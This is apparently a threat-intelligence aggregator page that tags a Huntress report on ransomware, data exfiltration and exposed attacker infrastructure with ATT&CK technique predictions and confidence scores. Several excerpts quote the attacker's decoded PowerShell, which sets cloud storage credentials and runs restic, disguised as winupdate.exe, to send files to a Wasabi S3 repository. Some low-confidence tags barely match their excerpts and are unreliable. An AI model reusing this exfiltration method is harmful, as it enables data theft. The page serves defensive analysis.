TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Data Exfiltration and Threat Actor Infrastructure Exposed

2026-03-12 · Read original ↗

ATT&CK techniques detected

10 predictions
T1486Data Encrypted for Impact
99%
“messages, which is also associated with other ransomware variants / families ( such as akira ) that use the restartmanager api to encrypt locked files. in this incident, huntress analysts were not able to determine the initial access vector, as the agent was not fully deployed ac…”
T1486Data Encrypted for Impact
99%
“agent. then the following message appeared in the windows event log : securitycenter / 15 ; vipre business agent, security _ product _ state _ off this was then followed by msiinstaller and system restore messages in the windows event log indicating that the vipre business agent …”
T1053.005Scheduled Task
95%
“being deployed within a customer ’ s infrastructure. upon closer inspection, analysts determined that the huntress agent was not completely deployed across that infrastructure, inhibiting visibility and obviating early detection. in addition, the customer was not using siem, so e…”
T1059.001PowerShell
93%
“was run, and when decoded, was similar to the above command. the one exception was the final line in the command, which appeared as follows : c : \ windows \ system32 \ winupdate. exe backup - - files - from c : \ users \ public \ documents \ new. txt huntress analysts were unabl…”
T1486Data Encrypted for Impact
87%
“[ redacted ] $ env : restic _ password = ' password ' c : \ windows \ system32 \ winupdate. exe backup - - files - from c : \ users \ public \ documents \ new. txt in this prior incident, the aws _ access _ key _ id and aws _ secret _ access _ key variables were identical to what…”
T1059.001PowerShell
83%
“task, a base64 - encoded powershell command is run, and when decoded, that command appears as follows : $ env : aws _ access _ key _ id = [ redacted ] $ env : aws _ secret _ access _ key = [ redacted ] $ env : restic _ repository = ' s3 : s3. wasabisys. com / [ redacted ] $ env :…”
T1059.001PowerShell
76%
“being deployed within a customer ’ s infrastructure. upon closer inspection, analysts determined that the huntress agent was not completely deployed across that infrastructure, inhibiting visibility and obviating early detection. in addition, the customer was not using siem, so e…”
T1003OS Credential Dumping
37%
“[ redacted ] $ env : restic _ password = ' password ' c : \ windows \ system32 \ winupdate. exe backup - - files - from c : \ users \ public \ documents \ new. txt in this prior incident, the aws _ access _ key _ id and aws _ secret _ access _ key variables were identical to what…”
T1080Taint Shared Content
34%
“agent. then the following message appeared in the windows event log : securitycenter / 15 ; vipre business agent, security _ product _ state _ off this was then followed by msiinstaller and system restore messages in the windows event log indicating that the vipre business agent …”
T1074Data Staged
31%
“data exfiltration and threat actor infrastructure exposed acknowledgements : special thanks to amelia casley, anton ovrutsky, jamie dumas, josh allman, and michael tigges for their work in triaging and investigating these incidents. huntress soc analysts have seen a great deal of…”

Summary

Threat actors are people, too, and like everyone else, make mistakes. These mistakes can reveal insights into the threat actor, or even expose access to their infrastructure.